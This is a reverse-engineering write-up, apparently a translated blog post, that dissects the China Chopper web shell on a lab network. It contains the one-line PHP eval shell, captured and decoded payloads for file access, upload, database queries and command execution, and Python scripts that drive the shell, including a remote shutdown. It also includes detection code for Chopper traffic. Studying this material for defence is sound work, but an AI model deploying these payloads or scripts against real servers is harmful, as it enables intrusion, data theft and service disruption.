A Powerful Tool: How China Chopper (菜刀) Works

Category: Reverse Engineering

Environment:
1. xp1: 192.168.110.132 (victim)
   PHPnow 1.5.6
   Wireshark 1.12.0
2. xp2: 192.168.110.129 (attacker)
   China Chopper 20100812
3. Kali: 192.168.110.128
   Python 2.7.3


Procedure:
First, in the web directory on xp1 we write the one-line shell <?php eval($_POST['wood']);?> and save it as 1.php.
Then we connect to it with Chopper and configure the database management settings.

0x01 Directory management
Capturing packets on xp1 gives us the following request:

POST /1.php HTTP/1.1
X-Forwarded-For: 199.1.88.29
Referer: http://192.168.110.132
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
Host: 192.168.110.132
Content-Length: 744
Cache-Control: no-cache

wood=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%[...]&z1=QzpcXFBIUG5vdy0xLjUuNi40MjM3NDkzNzM2XFxodGRvY3NcXA%3D%3D

The body is clearly URL-encoded on top of base64; decoding it yields the following:

wood=@eval(base64_decode($_POST[z0]));
&z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");; // hide error output, remove the execution time limit, disable magic quotes
$D=base64_decode($_POST["z1"]);
$F=@opendir($D);
if($F==NULL)
{
    echo("ERROR:// Path Not Found Or No Permission!");
}
else
{
    $M=NULL;$L=NULL;
    while($N=@readdir($F))
    {
        $P=$D."/".$N;
        $T=@date("Y-m-d H:i:s",@filemtime($P));
        @$E=substr(base_convert(@fileperms($P),10,8),-4);
        $R="\t".$T."\t".@filesize($P)."\t".$E."\n";
        if(@is_dir($P))
            $M.=$N."/".$R;
        else
            $L.=$N.$R;
    }
    echo $M.$L;
    @closedir($F);
};
echo("|<-");
die();
&z1=C:\\PHPnow-1.5.6.4237493736\\htdocs\\
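The payload above frames its output between `->|` and `|<-` and emits one line per entry: name (directories carry a trailing `/`), modification time, size and permissions, separated by tabs. The following Python 3 parser is an added example, not code from the original post; it recovers those entries from a captured reply, and the sample reply is constructed rather than a real capture.

```python
import re
from datetime import datetime

# Every Chopper payload echoes "->|" before its output and "|<-" after it;
# the client extracts what lies between, so a forensic parser does the same.
FRAME_RE = re.compile(r"->\|(.*?)\|<-", re.S)

def parse_listing_response(http_body):
    """Parse a directory-listing reply. Returns a list of entry dicts, None when the
    body is not framed, and raises ValueError on the payload's own ERROR:// message."""
    m = FRAME_RE.search(http_body)
    if m is None:
        return None
    framed = m.group(1)
    if framed.startswith("ERROR://"):
        raise ValueError(framed)
    entries = []
    for row in framed.split("\n"):          # one "\n"-terminated row per entry
        if not row:
            continue
        name, mtime, size, perms = row.split("\t")   # built as $N."\t".$T."\t".size."\t".$E
        entries.append({"name": name.rstrip("/"),
                        "is_dir": name.endswith("/"),   # directories get a trailing "/"
                        "mtime": datetime.strptime(mtime, "%Y-%m-%d %H:%M:%S"),
                        "size": int(size), "perms": perms})
    return entries

# Constructed reply in the format the payload builds (directories first); not a real capture.
SAMPLE_REPLY = ("->|htdocs/\t2014-08-01 10:00:00\t0\t0777\n"
                "1.php\t2014-08-01 10:05:00\t29\t0666\n"
                "1.txt\t2014-08-01 10:06:00\t4\t0666\n|<-")
```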

0x02 Downloading a file
We download 1.txt from xp1; its content is "test".
Captured request:

POST /1.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.110.132
User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
Host: 192.168.110.132
Content-Length: 472
Cache-Control: no-cache

wood=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRj1nZXRfbWFnaWNfcXVvdGVzX2dwYygpP3N0cmlwc2xhc2hlcygkX1BPU1RbInoxIl0pOiRfUE9TVFsiejEiXTskZnA9QGZvcGVuKCRGLCJyIik7aWYoQGZnZXRjKCRmcCkpe0BmY2xvc2UoJGZwKTtAcmVhZGZpbGUoJEYpO31lbHNle2VjaG8oIkVSUk9SOi8vIENhbiBOb3QgUmVhZCIpO307ZWNobygifDwtIik7ZGllKCk7&z1=C%3A%5C%5CPHPnow-1.5.6.4237493736%5C%5Chtdocs%5C%5C1.txt

Decoding it the same way gives:

wood=@eval(base64_decode($_POST[z0]));
&z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;
$F=get_magic_quotes_gpc()?stripslashes($_POST["z1"]):$_POST["z1"];
$fp=@fopen($F,"r");
if(@fgetc($fp))
{
    @fclose($fp);@readfile($F);
}
else
{
    echo("ERROR:// Can Not Read");
};
echo("|<-");die();
&z1=C:\\PHPnow-1.5.6.4237493736\\htdocs\\1.txt

0x03 Uploading a file
We upload an image named 1.png from xp2 to xp1.
Captured request:

POST /1.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.110.132
User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
Host: 192.168.110.132
Content-Length: 210271
Cache-Control: no-cache

&wood=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskZj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JGM9JF9QT1NUWyJ6MiJdOyRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOyRjPXN0cl9yZXBsYWNlKCJcbiIsIiIsJGMpOyRidWY9IiI7Zm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MikkYnVmLj11cmxkZWNvZGUoIiUiLnN1YnN0cigkYywkaSwyKSk7ZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1Zik%2FIjEiOiIwIik7O2VjaG8oInw8LSIpO2RpZSgpOw%3D%3D&z1=QzpcXFBIUG5vdy0xLjUuNi40MjM3NDkzNzM2XFxodGRvY3NcXDEucG5n&z2=89504E470D0A1A0A0000000D49484452000000230000001E0802000000295F307D00000006624B474400FF00FF00FFA0BDA793000000097048597300000EC400000EC401952B0E1B0000010B494441544889EDD73D8A85301000E09924164230B1F2069E417B3B6FE921AC3C8057F014064104F3F70A415CF7EDEE5BF42D5B64BA8461BEFC1499A0F77E18064484B7459EE70080DEFBBAAEBDF7EF93DAB60500060094D26D4A29358EE3751511D33495521E27D971A094EAFB9E3106D7C2185396E57792738E31B66FF1F5BAD334CDF30C0094D22449E23876CE9DD2AE2E1F00B4D6555565590600EBBA364D13C7F1E7B41B24E75C14455B7544B4D63E4D23D7A5172348410A52908214A4FF28DDF0E61242B4D6CBB200C0BAAE5F353C37485114755DB7772C42889F25428831E6B712220A218E80318690F3BD7C90A4944551DCD5593E91ACB55B75CE39E7FC22B3C7E978F0CF7E000F64E0671AD7A7382D0000000049454E44AE426082


Decoded:

&wood=@eval(base64_decode($_POST[z0]));&z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;
$f=base64_decode($_POST["z1"]);
$c=$_POST["z2"];
$c=str_replace("\r","",$c);
$c=str_replace("\n","",$c);
$buf="";
for($i=0;$i<strlen($c);$i+=2)
    $buf.=urldecode("%".substr($c,$i,2));
echo(@fwrite(fopen($f,"w"),$buf)?"1":"0");;
echo("|<-");die();
&z1=C:\\PHPnow-1.5.6.4237493736\\htdocs\\1.png
&z2=<the same hex string as in the raw request above> // z2 is the file's contents in hexadecimal

0x04 Database management

Database: dvwa, user: root, password: toor
Execute: SHOW TABLES FROM `dvwa`
Captured request:

POST /1.php HTTP/1.1
X-Forwarded-For: 199.1.88.29
Referer: http://192.168.110.132
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
Host: 192.168.110.132
Content-Length: 741
Cache-Control: no-cache

wood=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskbT1nZXRfbWFnaWNfcXVvdGVzX2dwYygpOyRoc3Q9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejEiXSk6JF9QT1NUWyJ6MSJdOyR1c3I9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejIiXSk6JF9QT1NUWyJ6MiJdOyRwd2Q9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejMiXSk6JF9QT1NUWyJ6MyJdOyRkYm49JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejQiXSk6JF9QT1NUWyJ6NCJdOyRUPUBteXNxbF9jb25uZWN0KCRoc3QsJHVzciwkcHdkKTskcT1AbXlzcWxfcXVlcnkoIlNIT1cgVEFCTEVTIEZST00gYHskZGJufWAiKTt3aGlsZSgkcnM9QG15c3FsX2ZldGNoX3JvdygkcSkpe2VjaG8odHJpbSgkcnNbMF0pLmNocig5KSk7fUBteXNxbF9jbG9zZSgkVCk7O2VjaG8oInw8LSIpO2RpZSgpOw%3D%3D&z1=localhost&z2=root&z3=toor&z4=dvwa

Decoded:

wood=@eval(base64_decode($_POST[z0]));&z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;
$m=get_magic_quotes_gpc();$hst=$m?stripslashes($_POST["z1"]):$_POST["z1"];
$usr=$m?stripslashes($_POST["z2"]):$_POST["z2"];
$pwd=$m?stripslashes($_POST["z3"]):$_POST["z3"];
$dbn=$m?stripslashes($_POST["z4"]):$_POST["z4"];
$T=@mysql_connect($hst,$usr,$pwd);
$q=@mysql_query("SHOW TABLES FROM `{$dbn}`");
while($rs=@mysql_fetch_row($q))
{
    echo(trim($rs[0]).chr(9));
}
@mysql_close($T);;echo("|<-");
die();
&z1=localhost&z2=root&z3=toor&z4=dvwa

Execute: SELECT * FROM `users` ORDER BY 1 DESC LIMIT 0,20

POST /1.php HTTP/1.1
X-Forwarded-For: 199.1.88.29
Referer: http://192.168.110.132
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
Host: 192.168.110.132
Content-Length: 866
Cache-Control: no-cache

wood=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskbT1nZXRfbWFnaWNfcXVvdGVzX2dwYygpOyRoc3Q9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejEiXSk6JF9QT1NUWyJ6MSJdOyR1c3I9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejIiXSk6JF9QT1NUWyJ6MiJdOyRwd2Q9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejMiXSk6JF9QT1NUWyJ6MyJdOyRkYm49JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejQiXSk6JF9QT1NUWyJ6NCJdOyR0YWI9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejUiXSk6JF9QT1NUWyJ6NSJdOyRUPUBteXNxbF9jb25uZWN0KCRoc3QsJHVzciwkcHdkKTtAbXlzcWxfc2VsZWN0X2RiKCRkYm4pOyRxPUBteXNxbF9xdWVyeSgiU0hPVyBDT0xVTU5TIEZST00gYHskdGFifWAiKTt3aGlsZSgkcnM9QG15c3FsX2ZldGNoX3JvdygkcSkpe2VjaG8odHJpbSgkcnNbMF0pLiIgKCIuJHJzWzFdLiIpIi5jaHIoOSkpO31AbXlzcWxfY2xvc2UoJFQpOztlY2hvKCJ8PC0iKTtkaWUoKTs%3D&z1=localhost&z2=root&z3=toor&z4=dvwa&z5=users

Decoded:

wood=@eval(base64_decode($_POST[z0]));&z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;
$m=get_magic_quotes_gpc();$hst=$m?stripslashes($_POST["z1"]):$_POST["z1"];
$usr=$m?stripslashes($_POST["z2"]):$_POST["z2"];
$pwd=$m?stripslashes($_POST["z3"]):$_POST["z3"];
$dbn=$m?stripslashes($_POST["z4"]):$_POST["z4"];
$tab=$m?stripslashes($_POST["z5"]):$_POST["z5"];
$T=@mysql_connect($hst,$usr,$pwd);
@mysql_select_db($dbn);$q=@mysql_query("SHOW COLUMNS FROM `{$tab}`");
while($rs=@mysql_fetch_row($q)){echo(trim($rs[0])." (".$rs[1].")".chr(9));}@mysql_close($T);;
echo("|<-");
die();
&z1=localhost&z2=root&z3=toor&z4=dvwa&z5=users

Execute: SELECT `user` FROM `users` ORDER BY 1 DESC LIMIT 0,10

POST /1.php HTTP/1.1
X-Forwarded-For: 199.1.88.29
Referer: http://192.168.110.132
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
Host: 192.168.110.132
Content-Length: 1027
Cache-Control: no-cache

wood=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskbT1nZXRfbWFnaWNfcXVvdGVzX2dwYygpOyRoc3Q9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejEiXSk6JF9QT1NUWyJ6MSJdOyR1c3I9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejIiXSk6JF9QT1NUWyJ6MiJdOyRwd2Q9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejMiXSk6JF9QT1NUWyJ6MyJdOyRkYm49JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejQiXSk6JF9QT1NUWyJ6NCJdOyRzcWw9YmFzZTY0X2RlY29kZSgkX1BPU1RbIno1Il0pOyRUPUBteXNxbF9jb25uZWN0KCRoc3QsJHVzciwkcHdkKTtAbXlzcWxfc2VsZWN0X2RiKCRkYm4pOyRxPUBteXNxbF9xdWVyeSgkc3FsKTskaT0wO3doaWxlKCRjb2w9QG15c3FsX2ZpZWxkX25hbWUoJHEsJGkpKXtlY2hvKCRjb2wuIlx0fFx0Iik7JGkrKzt9ZWNobygiXHJcbiIpO3doaWxlKCRycz1AbXlzcWxfZmV0Y2hfcm93KCRxKSl7Zm9yKCRjPTA7JGM8JGk7JGMrKyl7ZWNobyh0cmltKCRyc1skY10pKTtlY2hvKCJcdHxcdCIpO31lY2hvKCJcclxuIik7fUBteXNxbF9jbG9zZSgkVCk7O2VjaG8oInw8LSIpO2RpZSgpOw%3D%3D&z1=localhost&z2=root&z3=toor&z4=dvwa&z5=U0VMRUNUIGB1c2VyYCBGUk9NIGB1c2Vyc2AgT1JERVIgQlkgMSBERVNDIExJTUlUIDAsMTA%3D

Decoded:

wood=@eval(base64_decode($_POST[z0]));&z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;
$m=get_magic_quotes_gpc();
$hst=$m?stripslashes($_POST["z1"]):$_POST["z1"];
$usr=$m?stripslashes($_POST["z2"]):$_POST["z2"];
$pwd=$m?stripslashes($_POST["z3"]):$_POST["z3"];
$dbn=$m?stripslashes($_POST["z4"]):$_POST["z4"];
$sql=base64_decode($_POST["z5"]);
$T=@mysql_connect($hst,$usr,$pwd);
@mysql_select_db($dbn);
$q=@mysql_query($sql);
$i=0;
while($col=@mysql_field_name($q,$i))
{
    echo($col."\t|\t");
    $i++;
}
echo("\r\n");
while($rs=@mysql_fetch_row($q))
{
    for($c=0;$c<$i;$c++)
    {
        echo(trim($rs[$c]));
        echo("\t|\t");
    }
    echo("\r\n");
}
@mysql_close($T);;
echo("|<-");die();
&z1=localhost&z2=root&z3=toor&z4=dvwa&z5=SELECT `user` FROM `users` ORDER BY 1 DESC LIMIT 0,10

0x05 Virtual terminal
In Chopper's virtual terminal we execute: whoami
Captured request:

POST /1.php HTTP/1.1
X-Forwarded-For: 199.1.88.29
Referer: http://192.168.110.132
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
Host: 192.168.110.132
Content-Length: 550
Cache-Control: no-cache

wood=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyAneyRzfSciOiIvYyB7JHN9Ijskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIpOztlY2hvKCJ8PC0iKTtkaWUoKTs%3D&z1=Y21k&z2=Y2QgL2QgIkM6XFBIUG5vdy0xLjUuNi40MjM3NDkzNzM2XGh0ZG9jc1wiJndob2FtaSZlY2hvIFtTXSZjZCZlY2hvIFtFXQ%3D%3D

Decoded:

wood=@eval(base64_decode($_POST[z0]));&z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;
$p=base64_decode($_POST["z1"]);
$s=base64_decode($_POST["z2"]);
$d=dirname($_SERVER["SCRIPT_FILENAME"]);
$c=substr($d,0,1)=="/"?"-c '{$s}'":"/c {$s}";
$r="{$p} {$c}";
@system($r." 2>&1");;
echo("|<-");
die();
&z1=cmd&z2=cd /d "C:\PHPnow-1.5.6.4237493736\htdocs\"&whoami&echo [S]&cd&echo [E]

Analysis
From the captures above we can see that Chopper operates by sending base64-encoded PHP code in the POST body, which the one-line shell decodes and evaluates. It follows that we can emulate Chopper's functionality ourselves; below I do so with two Python scripts.
dir.py:

# Python 2.7, as in the environment above
import urllib

# z0 is the base64 of the directory-listing payload decoded in 0x01;
# z1 is the base64 of the directory to list
params = urllib.urlencode({
    "wood": "@eval(base64_decode($_POST[z0]));",
    "z0": "QGlua"
          "V9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b"
          "3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7J"
          "EY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPc"
          "iBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkR"
          "ikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c"
          "3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiL"
          "kBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlI"
          "CRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7",
    "z1": "QzpcXFBIUG5vdy0xLjUuNi40MjM3NDkzNzM2XFxodGRvY3NcXA==",
})
f = urllib.urlopen("http://192.168.110.132/1.php", params)
print f.read()

shutdown.py:

# Python 2.7, as in the environment above
import urllib

# z0 is the base64 of a PHP snippet that runs the system shutdown command
params = urllib.urlencode({
    "wood": "@eval(base64_decode($_POST[z0]));",
    "z0": "ZWNobyBgc2h1dGRvd24gLXMgLXQgMGA7",
})
f = urllib.urlopen("http://192.168.110.132/1.php", params)
f.read()
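Because every request has the same shape, a defender can triage captured POST bodies the same way the analysis above did by hand: locate the `@eval(base64_decode($_POST[...]))` stager, base64-decode the payload parameter, check for the fixed `@ini_set("display_errors","0")` prelude and the `->|`/`|<-` markers, and map the PHP functions back to the Chopper feature that produced the request. The Python 3 code below is an added example, not the author's scripts or Chopper's own code; the two request bodies are constructed from the decoded 0x03 and 0x05 payloads, with a hypothetical upload path.

```python
import base64, re
from urllib.parse import parse_qs, urlencode

# Traits present in every decoded z0 payload on this page, plus one PHP call per Chopper feature.
STAGER_RE = re.compile(r"@eval\(base64_decode\(\$_POST\[(\w+)\]\)\)")
PRELUDE = '@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);'
MARKERS = ('echo("->|")', 'echo("|<-")')  # response delimiters the client scans for
ACTIONS = [("list_directory", "opendir("), ("read_file", "readfile("), ("write_file", "fwrite("),
           ("database", "mysql_connect("), ("shell_command", "system(")]

def classify_chopper_post(body):
    """Return a description dict, or None when the body is not Chopper traffic."""
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    hits = [(k, m.group(1)) for k, m in ((k, STAGER_RE.search(v)) for k, v in fields.items()) if m]
    if not hits:
        return None
    shell_param, payload_param = hits[0]  # e.g. ("wood", "z0")
    try:
        php = base64.b64decode(fields.get(payload_param, ""), validate=True).decode("latin-1")
    except ValueError:
        return None
    action = next((name for name, call in ACTIONS if call in php), "unknown")
    args = {}
    for k, v in fields.items():
        if k in (shell_param, payload_param):
            continue
        if 'base64_decode($_POST["%s"])' % k in php:  # argument shipped as base64
            v = base64.b64decode(v).decode("latin-1")
        elif action == "write_file" and k == "z2":    # uploaded file body sent as hex
            v = bytes.fromhex(v)
        args[k] = v
    return {"shell_param": shell_param, "action": action, "args": args,
            "has_prelude": php.startswith(PRELUDE), "has_markers": all(m in php for m in MARKERS)}

def make_sample_body(php, **extra):
    """Constructed request body shaped like the captures above (not real traffic)."""
    fields = {"wood": "@eval(base64_decode($_POST[z0]));", "z0": base64.b64encode(php.encode()).decode()}
    fields.update(extra)
    return urlencode(fields)

COMMON = PRELUDE + 'echo("->|");;'
# Constructed from the decoded virtual-terminal request (0x05): z1 and z2 arrive as base64.
CMD_BODY = make_sample_body(COMMON + '$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);'
                            '@system("{$p} /c {$s} 2>&1");;echo("|<-");die();',
                            z1="Y21k", z2=base64.b64encode(b"whoami").decode())
# Constructed from the upload request (0x03): z1 is a base64 path (hypothetical), z2 the file as hex.
UP_BODY = make_sample_body(COMMON + '$f=base64_decode($_POST["z1"]);$c=$_POST["z2"];'
                           'echo(@fwrite(fopen($f,"w"),$buf)?"1":"0");;echo("|<-");die();',
                           z1=base64.b64encode(b"C:\\PHPnow\\htdocs\\1.png").decode(), z2="89504E470D0A1A0A")
```

Run over a web server's POST bodies, `has_prelude` and `has_markers` together are a high-confidence indicator even when the shell parameter name differs from `wood`, and `args` recovers the path, command or uploaded bytes for the incident record.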


This article was first published on the WeChat public account T00ls: 强大的利器-菜刀工作原理分析 (A Powerful Tool: How China Chopper Works)
